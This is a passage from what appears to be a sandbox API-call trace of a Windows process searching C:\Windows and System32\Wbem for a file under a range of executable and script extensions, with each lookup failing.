ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.326] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.326] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.CPL" (normalized: "c:\\windows\\\x9f.cpl"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.327] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.327] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.327] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.327] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f" (normalized: "c:\\windows\\\x9f"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.333] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.ps1" (normalized: "c:\\windows\\system32\\wbem\\\x9f.ps1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.334] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.334] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.psm1" (normalized: "c:\\windows\\system32\\wbem\\\x9f.psm1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.335] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.335] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.psd1" (normalized: "c:\\windows\\system32\\wbem\\\x9f.psd1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.336] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.336] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.COM" (normalized: "c:\\windows\\system32\\wbem\\\x9f.com"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.336] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.337] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.EXE" (normalized: "c:\\windows\\system32\\wbem\\\x9f.exe"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.337] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.337] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.BAT" (normalized: "c:\\windows\\system32\\wbem\\\x9f.bat"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.338] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.338] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.CMD" (normalized: "c:\\windows\\system32\\wbem\\\x9f.cmd"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.339] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.339] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.VBS" (normalized: "c:\\windows\\system32\\wbem\\\x9f.vbs"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.339] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.340] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.VBE" (normalized: "c:\\windows\\system32\\wbem\\\x9f.vbe"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.340] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.340] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.JS" (normalized: "c:\\windows\\system32\\wbem\\\x9f.js"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.341] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.341] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.JSE" (normalized: "c:\\windows\\system32\\wbem\\\x9f.jse"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.342] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.342] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.WSF" (normalized: "c:\\windows\\system32\\wbem\\\x9f.wsf"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.342] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.343] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.WSH" (normalized: "c:\\windows\\system32\\wbem\\\x9f.wsh"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.344] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.MSC" (normalized: "c:\\windows\\system32\\wbem\\\x9f.msc"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, 